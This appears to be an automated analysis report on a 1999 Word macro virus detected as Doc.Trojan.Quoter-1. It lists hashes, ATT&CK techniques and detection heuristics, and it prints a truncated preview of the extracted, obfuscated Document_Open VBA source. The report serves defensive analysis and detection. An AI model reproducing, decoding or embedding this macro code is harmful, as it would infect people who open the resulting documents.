Office (OLE) malware analysis — malicious · 36d4b065d36ea0f2

MALICIOUS

Office (OLE)

48.5 KB Created: 1999-06-03 14:04:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 0b93cd3b7a1415f0868417f21e702ccc SHA-1: 36242a2550ffacbdd82d417a10ee6cb0614e6b02 SHA-256: 36d4b065d36ea0f2737fecc77f58d8dd4024baf40b4aa2009bb45d77a1b0d007

220 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Quoter-1. Static analysis revealed the presence of VBA macros, specifically a Document_Open macro that executes shell commands. This indicates the document is designed to download and execute a secondary payload upon opening, a common tactic for malware distribution.

Heuristics 4

ClamAV: Doc.Trojan.Quoter-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Quoter-1
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	36774 bytes
SHA-256: `420b88e0b60a7c338e929fc03da10a4cd13cd60355176550e508ee1be2327c0f`
Detection ClamAV: Doc.Trojan.Quoter-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() ''13 Bas = 0 ''n-J-Np�vƒrQ\|p‚zr{�;cO] \|wrp�;cOP\|z}\|{r{�€5>6;P\|qrZ\|q‚yr;Yv{r€5>9->6 ''Vs-n-J-/] vƒn�r-`‚o-Q\|p‚zr{�l\}r{56/-aur{ ''`r�-v{s-J-[\| znyarz}yn�r ''`r�-€\|‚ -J-Np�vƒrQ\|p‚zr{� ''Vqr{�-J-Vqr{�-8-> ''R{q-Vs ''N}}yvpn�v\|{;R{noyrPn{pryXr†-J-„qPn{pryQv€noyrq ''n-J-[\| znyarz}yn�r;cO] \|wrp�;cOP\|z}\|{r{�€5>6;P\|qrZ\|q‚yr;Yv{r€5>9->6 ''Vs-n-J-/] vƒn�r-`‚o-Q\|p‚zr{�l\}r{56/-aur{ ''`r�-€\|‚ -J-[\| znyarz}yn�r ''`r�-v{s-J-Np�vƒrQ\|p‚zr{� ''Vqr{�-J-Vqr{�-8-? ''R{q-Vs ''Vs-Vqr{�-J-@-aur{ ''`r�-v{s-J-[\| znyarz}yn�r ''`r�-€\|‚ -J-Np�vƒrQ\|p‚zr{� ''R{q-Vs ''N}}yvpn�v\|{;\}�v\|{€;cv ‚€] \|�rp�v\|{-J-Sny€r ''\}�v\|{€;`nƒr[\| zny] \|z}�-J-Sny€r ''_n{q\|zv‡r-avzr '' {q[‚zor -J-V{�5_{q-7->==6-8-> ''_Y-J-@ ''€\|‚ ;cO] \|wrp�;cOP\|z}\|{r{�€5>6;P\|qrZ\|q‚yr; r}ynpryv{r-?9-/44/-3- {q[‚zor ''_Y-J-= ''Np�vƒn�r€-J-= ''_Y-J-@ ''yv{-J-€\|‚ ;cO] \|wrp�;cOP\|z}\|{r{�€5>6;P\|qrZ\|q‚yr;P\|‚{�\sYv{r€ ''�-J-> ''Q\|-b{�vy-�-J-yv{ ''`}nprY-J-> ''�-J-�-8-> ''y-J-€\|‚ ;cO] \|wrp�;cOP\|z}\|{r{�€5>6;P\|qrZ\|q‚yr;Yv{r€5�9->6 ''Vs-Np�vƒn�r€-J->-aur{-T\|a\|-\ƒr W‚z} ''Vs-y-J-/R{q-`‚o/-aur{ ''Np�vƒn�r€-J-> ''T\|a\|-[r…W‚z} ''Ry€r ''T\|a\|-[r…W‚z} ''R{q-Vs ''\ƒr W‚z}G ''Vs-y-J-/] vƒn�r-`‚o-Q\|p‚zr{�lPy\|€r56/-aur{-T\|a\|-[r…W‚z} ''Vs-y-J-/R{q-`‚o/-aur{-T\|a\|-R`‚o ''Vs-V{`� 5y9-/„v{qv -J/6-K-=-N{q-V{`� 5y9-/V{`� /6-J-=-N{q-Vqr{�-J-@-aur{-[\|Qry-J-> ''yy-J-Yr{5y6 ''S\| -v-J->-a\|-yy ''o-J-Zvq5y9-v9->6 ''p-J-N€p5o6 ''p-J-p-8- {q[‚zor ''o-J-Pu 5p6 ''arz}Y-J-arz}Y-3-o ''`}nprY-J-= ''[r…�-v ''Vs-`}nprY-J-=-aur{ ''_Y-J-_Y-8-> ''Q\| ''} \|ƒrP\|qr-J-€\|‚ ;cO] \|wrp�;cOP\|z}\|{r{�€5>6;P\|qrZ\|q‚yr;Yv{r€5_Y9->6 ''Vs-Yrs�5} \|ƒrP\|qr9-?6-J-/44/-aur{-R…v�-Q\| ''_Y-J-_Y-8-> ''Y\|\|} ''€\|‚ ;cO] \|wrp�;cOP\|z}\|{r{�€5>6;P\|qrZ\|q‚yr; r}ynpryv{r-_Y9-/44/-3-arz}Y ''Vs-[\|Qry-IK->-aur{ ''€\|‚ ;cO] \|wrp�;cOP\|z}\|{r{�€5>6;P\|qrZ\|q‚yr;Qryr�rYv{r€-�9-> ''Ry€r ''�-J-�-8-> ''R{q-Vs ''arz}Y-J-// ''R{q-Vs ''y-J-€\|‚ ;cO] \|wrp�;cOP\|z}\|{r{�€5>6;P\|qrZ\|q‚yr;Yv{r€5�9->6 ''T\|a\|-\ƒr W‚z} ''W‚z}G ''[r…W‚z}G ''Y\|\|} ''R`‚oG ''d v��r{O†-J-/SYVa[VP/ ''s‚px-J-/SbPX-Nc].9-SbPX-S:]_\a.9-SbPX-Q ;-`\Y\Z\[.9-SbPX-UZc`.9-SbPX-S:dV[@?./ ''_n{q\|zv‡r-avzr '' {qcn Y-J-V{�5_{q-7-?=6-8-> ''S\| -p rn�rcn -J->-a\|- {qcn Y '' {qcn -J-V{�5_{q-7->?C6-8->?E ''[r„cn -J-[r„cn -3-Pu 5 {qcn 6 ''[r…�-p rn�rcn '' ��-J-> ''Q\| '' ��-J- ��-8-> ''n-J-€\|‚ ;cO] \|wrp�;cOP\|z}\|{r{�€5>6;P\|qrZ\|q‚yr;Yv{r€5 ��9->6 ''Vs-n-J-/R{q-`‚o/-aur{-R…v�-Q\| ''Y\|\|} ''„ur rV{€r �-J-V{�5_{q-7- ��-:-A6-8-A ''€\|‚ ;cO] \|wrp�;cOP\|z}\|{r{�€5>6;P\|qrZ\|q‚yr;V{€r �Yv{r€-„ur rV{€r �9-[r„cn -3-/G/ '' {qcn Y-J-V{�5_{q-7-?=6-8-> ''S\| -p rn�rcn -J->-a\|- {qcn Y '' {qcn -J-V{�5_{q-7->?C6-8->?E ''[r„cn ?-J-[r„cn ?-3-Pu 5 {qcn 6 ''[r…�-p rn�rcn ''[r„cn ?-J-Pu 5@A6-3-[r„cn ?-3-Pu 5@A6 '' ��-J-> ''Q\| '' ��-J- ��-8-> ''n-J-€\|‚ ;cO] \|wrp�;cOP\|z}\|{r{�€5>6;P\|qrZ\|q‚yr;Yv{r€5 ��9->6 ''Vs-n-J-/R{q-`‚o/-aur{-R…v�-Q\| ''Y\|\|} ''„ur rV{€r �-J-V{�5_{q-7- ��-:-A6-8-A ''€\|‚ ;cO] \|wrp�;cOP\|z}\|{r{�€5>6;P\|qrZ\|q‚yr;V{€r �Yv{r€-„ur rV{€r �9-[r„cn -3-/J/-3-[r„cn ? '' {qcn Y-J-V{�5_{q-7-?=6-8-> ''S\| -p rn�rcn -J->-a\|- {qcn Y '' {qcn -J-V{�5_{q-7->?C6-8->?E ''[r„cn -J-[r„cn -3-Pu 5 {qcn 6 ''[r…�-p rn�rcn ''[r„cn -J-/_rz-/-3-[r„cn '' ��-J-> ''Q\| '' ��-J- ��-8-> ''n-J-€\|‚ ;cO] \|wrp�;cOP\|z}\|{r{�€5>6;P\|qrZ\|q‚yr;Yv{r€5 ��9->6 ''Vs-n-J-/R{q-`‚o/-aur{-R…v�-Q\| ''Y\|\|} ''„ur rV{€r �-J-V{�5_{q-7- ��-:-A6-8-A ''€\|‚ ;cO] \|wrp�;cOP\|z}\|{r{�€5>6;P\|qrZ\|q‚yr;V{€r �Yv{r€-„ur rV{€r �9-[r„cn ''Vs-bPn€r5v{s6-J-/[\_ZNY;Q\a/-aur{ ''€\|‚ ;cO] \|wrp�;cOP\|z}\|{r{�€5>6;P\|qrZ\|q‚yr; r}ynpryv{r-@9-/On€-J->/ ''Ry€r ''€\|‚ ;cO] \|wrp�;cOP\|z}\|{r{�€5>6;P\|qrZ\|q‚yr; r}ynpryv{r-@9-/On€-J-=/ ''R{q-Vs ''SP\|qr-J-€\|‚ ;cO] \|wrp�;cOP\|z}\|{r{�€5>6;P\|qrZ\|q‚yr;Yv{r€5>9-€\|‚ ;cO] \|wrp�;cOP\|z}\|{r{�€5>6;P\|qrZ\|q‚yr;P\|‚{�\sYv{r€6 ''Vs-bPn€r5v{s6-J-/[\_ZNY;Q\a/-aur{ ''€\|‚ ;cO] \|wrp�;cOP\|z}\|{r{�€5>6;P\|qrZ\|q‚yr; r}ynpryv{r-@9-/O ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.